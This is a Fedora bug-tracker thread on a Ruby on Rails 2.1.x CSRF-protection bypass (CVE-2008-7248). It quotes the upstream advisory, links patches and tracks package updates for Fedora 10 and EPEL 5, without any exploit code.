A possibility to circumvent protection against cross-site request forgery (CSRF) attacks was found in Ruby on Rails. Quoting upstream security advisory for exact details: There is a bug in all 2.1.x versions of Ruby on Rails which affects the effectiveness of the CSRF protection given by protect_from_forgery. By design rails does not perform token verification on requests with certain content types not typically generated by browsers. Unfortunately this list also included ‘text/plain’ which can be generated by browsers. Requests can be crafted which will circumvent the CSRF protection entirely. Rails does not parse the parameters provided with these requests, but that may not be enough to protect your application. References: ----------- http://www.rorsecurity.info/journal/2008/11/19/circumvent-rails-csrf-protection.html http://weblog.rubyonrails.org/2008/11/18/potential-circumvention-of-csrf-protection-in-rails-2-1 Upstream patch: --------------- http://github.com/rails/rails/commit/099a98e9b7108dae3e0f78b207e0a7dc5913bd1a CVE Request: ------------ http://www.openwall.com/lists/oss-security/2009/11/28/1
This issue affects the versions of the rubygem-actionpack package, as shipped with Fedora release of 10, 11 and 12. This issue affects the version of the rubygem-actionpack package, as shipped with Extra Packages for Enterprise Linux 5 (EPEL-5) project. Please fix.
For F-13/12/11 (i.e. for rubygem-actionpack 2.3.x) this is NOTABUG because the usage of unverifiable_types is deprecated (and not used) https://rails.lighthouseapp.com/projects/8994/tickets/1145-bug-invalidauthenticitytoken-incorrectly-raised-for-xml-controllerdestroy-request git commit: http://github.com/rails/rails/commit/f1ad8b48aae3ee26613b3e77bc0056e120096846 Only affects F-10 and EL-5, if any.
rubygem-actionpack-2.1.1-5.fc10 has been submitted as an update for Fedora 10. http://admin.fedoraproject.org/updates/rubygem-actionpack-2.1.1-5.fc10
rubygem-actionpack-2.1.1-5.el5 has been submitted as an update for Fedora EPEL 5. http://admin.fedoraproject.org/updates/rubygem-actionpack-2.1.1-5.el5
rubygem-actionpack-2.1.1-5.el5 has been pushed to the Fedora EPEL 5 stable repository. If problems still persist, please make note of it in this bug report.
rubygem-actionpack-2.1.1-5.fc10 has been pushed to the Fedora 10 stable repository. If problems still persist, please make note of it in this bug report.
This is CVE-2008-7248.
I think this can be closed.